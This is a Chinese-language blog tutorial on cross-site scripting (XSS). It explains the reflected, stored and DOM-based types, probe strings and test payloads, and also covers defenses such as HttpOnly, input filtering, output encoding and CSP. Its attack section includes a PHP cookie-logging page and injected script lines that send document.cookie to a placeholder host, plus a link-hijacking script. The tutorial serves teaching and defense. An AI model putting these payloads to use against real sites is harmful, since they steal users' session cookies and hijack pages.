Web安全——跨站脚本攻击(XSS)

最新推荐文章于 2024-04-26 16:35:31 发布
最新推荐文章于 2024-04-26 16:35:31 发布
阅读量711 收藏 3
点赞数
分类专栏: Web安全 文章标签: 安全 php javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Newscoo/article/details/119328005
版权

跨站脚本攻击(XSS)

什么是XSS?

跨站脚本攻击(XSS),全称为Cross Site Script,通常指黑客通过“HTML”注入篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击,一开始这种攻击的演示案例是跨域的,所以叫做“跨站脚本”。

一、XSS的分类

XSS分为:反射型XSS、存储型XSS和DOM Based XSS。

1、反射型XSS

反射型XSS只是简单地把用户输入的数据“反射”给浏览器,也就是说,黑客往往需要诱使用户“点击”一个恶意链接,才能攻击成功。反射型XSS也叫做“非持久型XSS”
例如:
如果访问http://www.a.com/test.php?param=<script>alert(/xss/)</script>
会发现,alert(/xss/)在当前页面执行了;
查看源代码:<div><script>alert(/xss/)</script></div>

2、存储型XSS

存储型XSS会把用户输入的数据“存储”在服务器端,这种XSS具有很强的稳定性。
比较常见的场景:攻击者写下一篇包含有恶意JavaScript代码的博客文章,文章发表后,所有访问该博文的用户都会在他们的浏览器中执行这段恶意代码,攻击者把恶意脚本保存到服务器端,这种XSS攻击就叫做“存储型XSS”,也成为“持久型XSS”。

3、DOM Based XSS

DOM Based XSS理论上从效果来看属于反射型XSS,但比较特殊,所以单独来说它。
DOM Based XSS是通过修改页面的DOM节点形成的XSS。

二、跨站脚本的挖掘方法

1、跨站脚本的核心挖掘思想

输入与输出——判断输入是否过滤,输出是否被过滤。

2、跨站脚本的测试思路

寻找出一个Web服务器的注入点,指的是攻击者可控内容的提交的位置。
注入点:专业术语中叫做向量,一切可以提交数据到页面的点都称作注入点。

3、XSS探针

xss探针可检测出网站有没有对xss漏洞做最基础的防御。我们可以在测试xss的位置写'';!--"<XSS>=&{()},查看页面源码,观察哪些代码被过滤或者转义。

4、跨站脚本的测试语句

<script>alert(/xss/);</script>
<script>alert(/xss/)</script>
<img src=1 onmouseover=alert(1)>
<a herf=1 onload=alert(1)>nmask</a>
<script>window.a==1?1:prompt(a=1)</script>
<script>a=prompt;a(1)</script>
<img src=0 onerror=confirm('1')>

三、跨站脚本的攻击技巧

1、窃取Cookie

编写xss_cookie.php页面用于接收Cookie
代码如下:

<?php
$cookie=$_GET['cookie'];
$log=fopen("cookie.txt","a");
fwrite($log,$cookie."\n");
fclose($log);
?>

在存在xss漏洞的地方,插入以下代码,便可以将cookie发送到xss_cookie.php,并且将cookie参数传递进去,写入文件中。

<img src="http://URL/xss_cookie.php?cookie='+document.cookie"></img>
<script>new Image().src="http://XXX/xss_cookie.php?cookie="+document.cookie;</script>

2、篡改网页

编写一个test.js脚本,用于做页面跳转
代码如下:

var objs=document.getElementsByTagName("a");
var b = objs.length
for(var a = 0; a < b; a++){
	objs[a].href = "http://www.baidu.com";
}

通过访问该漏洞网站,触发执行替换a标签中链接的操作。将以下语句插入存在存储型xss漏洞的网站,来实现页面跳转的目的。

<script type='text/javascript' src='http://localhost/cspt/XSS/test.js'></script>

3、网络钓鱼

4、网络挂马

通过DVWA实现网络挂马

5、BEEF

BEEF( The Browser Exploitation Framework) 是由Wade Alcorn 在2006年开始创建的,至今还在维护。是由ruby语言开发的专门针对浏览器攻击的框架。

四、防御跨站脚本攻击的技巧

1、HttpOnly

HttpOnly解决了XSS后的Cookie劫持攻击。

2、输入检查

(1)输入过滤

"永远不要相信用户的输入"是网站开发的基本常识,对于用户输入一定要过滤,过滤,再过滤。

(2)输入验证

输入验证就是对用户提交的信息进行有效验证,仅接受指定长度范围内的,采用适当格式的内容提交,阻止或者忽略除此之外的其他任何数据。

3、输出检查

除富文本输出外,在变量输出到HTML页面时,可以使用编码或转义的方式来防御XSS攻击, HTML 编码主要是用对应的HTML 实体代替字符。

4、内容安全策略(CSP)

内容安全策略(Content Security Policy,CSP),实质就是白名单制度,开发者明确告诉客户端,哪些外部资源可以加载和执行,大大增强了网页的安全性。

总结

理论上,XSS漏洞虽然复杂,但是是可以彻底解决的,在设计XSS解决方案时,应该深入理解XSS攻击原理,针对不同的场景使用不同的方法,同时也有很多开源项目可供学习参考。

网安小白又又又来瞎咧咧了!!!如有不足,请多指教!!!

Ha0_Liu
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS脚本攻击)多姿势绕过滤思路
ElsonHY的博客
11-17 1229
XXS(脚本攻击)多姿势绕过滤思路0x01 什么是XSS?0x02 XSS的危害0x03 XSS类型0x04 多姿势绕过1.基本的xss2.大小写绕过、字符拼接3.解锁更多姿势4.转义字符的排除0x05 其他情况0x06 总结 0x01 什么是XSS? 恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页面时,嵌入Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。XSS攻击主要针对的是客户端的攻击。 0x02 XSS的危害 XSS能实现的的攻击有很多,一般攻击水平是取决
XSS脚本攻击(1)
weixin_48712514的博客
05-12 201
~~XSS概述 通过将精心构造的代码(js)注入到网⻚中,并器解释运行这段JS 代码,以达到恶意的效果。当用户访问被XSS 脚本注入过的网⻚,XSS 脚本就会被提取出来,用户浏览器就会解析执行这段代码,也就是说用户被攻击XSS漏洞验证 SWASP TOP 10安全之一 aelert(/xss/); 英文名:饿乐得 confirm('xss'); 英文名:肯风 prompt('xss'); 英文名: <script>aelert(/x
脚本攻击字符过滤
07-25
用这个办法,可以过滤在输入中含有 % [ ] { } ; & + - " ( ) 的这些字符。
XSS注入(脚本攻击)原理与实践
最新发布
打工人的自我修养
04-26 1332
XSS注入是一种最普遍的网应用程式的安全漏洞攻击,允许恶意使用者将程式码注入到网页上,其他使用者在观看网页时就会受到影响。这类攻击通常包含了HTML以及使用者端脚本语言。
xss脚本过滤
u011697091的博客
03-05 2577
自定义XssRequestWrapper集成HttpServletRequestWrapper package com.workflow.base.filter; import org.apache.commons.lang.StringUtils; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import javax.servlet.http.HttpServletRequest; import javax.servlet.
防止XSS脚本攻击:Java过滤器
热门推荐
琦彦
01-25 2万+
XSS问题描述 脚本(Cross site script,简称xss)是一种“HTML注入”,由于攻击脚本多数时候是域的,所以称之为“脚本”。 我们常常听到“注入”(Injection),如SQL注入,那么到底“注入”是什么?注入本质上就是把输入的数据变成可执行的程序语句。SQL注入是如此,XSS也如此,只不过XSS一般注入的是恶意的脚本代码,这些脚本代码可以用来获取合法用户的数...
XSS脚本攻击剖析与防御.pdf
05-16
XSS脚本攻击剖析与防御》是一本专门剖析XSS安全的专业书,总共8章,主要包括的内容如下。第1章 XSS初探,主要阐述了XSS的基础知识,包括XSS攻击原理和危害。第2章 XSS利用方式,就当前比较流行的XSS利用方式做...
XSS脚本攻击剖析与防御
04-28
XSS脚本攻击剖析与防御是一本专门剖析XSS安全的专业书,总共8章,主要包括的内容如下。第1章 XSS初探,主要阐述了XSS的基础知识,包括XSS攻击原理和危害。第2章 XSS利用方式,就当前比较流行的XSS利用方式做了...
也谈脚本攻击与防御
01-02
网络上曾经有过关于脚本攻击与防御的文章,但是随着攻击技术的进步,以前的关于脚本攻击的看法与理论已经不能满足现在的攻击与防御的需要了,而且由于这种对于脚本认识上的混乱,导致现在很多的程序包括...
xss攻击
09-25
在2007年OWASP所统计的所有安全威胁中,脚本攻击占到了22%,高居所有Web威胁之首。 XSS攻击的危害包括 1、盗取各类用户帐号,如机器登录帐号、用户网银帐号、各类管理员帐号 2、控制企业数据,包括读取、篡改、...
XSS脚本gj剖析与防御.pdf
05-13
XSS脚本攻击剖析与防御》是一本专门剖析XSS安全的专业书,总共8章,主要包括的内容如下。第1章 XSS初探,主要阐述了XSS的基础知识,包括XSS攻击原理和危害。第2章 XSS利用方式,就当前比较流行的XSS利用方式...
yasuo:一种ruby脚本,可扫描网络上易受攻击且可利用的第三方Web应用程序
02-02
靖[[0xsauby] 描述 Yasuo是一个Ruby脚本,可扫描易受攻击的第三方Web应用程序。 在进行网络安全评估(内部,外部,redteam演出等)时,我们经常会遇到易受攻击的第三方Web应用程序或Web前端,这些漏洞使我们能够通过利用众所周知的漏洞来危害远程服务器。 一些常见的应用程序是Apache Tomcat管理界面,JBoss jmx-console,Hudson Jenkins等。 如果通过Exploit-db搜索,则大量的Web应用程序/前端中存在10,000多个可远程利用的漏洞,并且可能使攻击者完全破坏后端服务器。 这些漏洞的范围从RCE到恶意文件上传,从SQL注入到RFI / LFI等。 Yasuo的构建目的是快速扫描网络中是否存在此类易受攻击的应用程序,从而将可攻击的目标放在银盘上。 设置/安装 您将需要安装以下gem: 捆绑安装--path供应商 捆绑程序exec ./yasuo.rb -f [myfile] 细节 Yasuo提供了以下命令行选项: -r ::如果要Yasuo执行端口扫描,请使用此开关提供IP地址或IP范围 -l ::如果要Yasuo
Web安全脚本攻击XSS
qq_44005305的博客
01-14 249
脚本攻击,英文全称是 Cross Site Script,本来缩写是CSS,但是为了和层叠样式表(Cascading Style Sheet,CSS)有所区别,所以在安全领域叫做“XSS”。XSS 攻击,通常指黑客利用网没有对用户提交数据进行转义处理或者过滤不足的缺点,从而通过“HTML注入”篡改了网页,插入了恶意的脚本,然后在用户浏览网页时,控制用户浏览器(盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害)的一种攻击方式。
【网络安全脚本攻击漏洞(了解)
love_wgll的博客
03-02 624
介绍脚本攻击漏洞
java过滤脚本攻击_SpringBoot过滤XSS脚本攻击
weixin_33900916的博客
02-24 307
前排提醒源码在最后XSS攻击是什么XSS攻击全称脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将脚本攻击缩写为XSSXSS是一种在web应用中的计算机安全漏洞,它允许恶意web客户将代码植入到提供给其它客户使用的页面中。简而言之,就是作恶客户通过表单提交少量前台代码,假如不做解决的话,这些前台代码将会在展现的时候被浏览器执行。如何避免...
存储型Xss脚本攻击解决方案
weixin_44442403的博客
10-15 1592
一 新建一个XssFilter类 package com.walk.common.xssnew; import java.io.IOException; import javax.servlet.Filter; import javax.servlet.FilterChain; import javax.servlet.FilterConfig; import javax.servl...
谈谈对于XSS脚本攻击的学习(1)
2302_76827504的博客
04-17 311
最近学完XXE之后,对于这种恶意代码注入的漏洞提起来兴趣,想着现在正好趁热打铁,学习一下XSS,之前做题的时候看大师傅的wp一愣一愣的,不明白个所以然,这次系统的学习一下,在本文中将介绍有关XSS的知识点以及原理,也会介绍XSS的绕过姿势(这里参考了别的大师傅的思路,也给出了我自己的理解),希望给正在学习XSS的你有帮助。
XSS脚本攻击解决方案
attilax的专栏
06-05 4392
XSS脚本攻击解决方案 如果用户表单输入一些内容,……特别是一些内容比较多的表单项,且无固定格式 ,如地址,文章内容……此时用户可以输入JS代码等来执行 STEP1:在设计方案上,输入项要尽可能检测格式并限制长度。要有服务端检测,不能依赖客户端检测。在数据库设计上要限制字段长度…… 输出页面时需要进行HTML转码,如输出地址内容 td >convert.html(cus.getAdd
web黑客前端技术揭秘 XSS探针:xssprobe 笔记
滕青山博客
02-09 968
前言 xssprobe是evilcos在github开源的一个小工具,通过它可以获取目标页面通用数据。这篇文章是我在在学习源码及实际演练的笔记。 demo.html 含有xss漏洞页面,可以被注入XSS恶意代码来让受害者执行,从而获取受害者的个人信息,如cookie,flash信息,浏览器版本,操作系统版本... 为了方便演示,直接在代码中<script>...</script>引入恶意js代码。 probe.js 就是上面提到的恶意代码,可以获取受害者的隐私信息。 需
攻击(XSS+CSRF).docx
01-05
"本次实验主要关注的是Web安全中的两种重要攻击方式:脚本攻击XSS)和请求伪造(CSRF)。实验旨在让参与者深入理解这两种攻击的原理,掌握不同级别的攻击实施,并了解相应的防御和修复措施。实验环境为...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值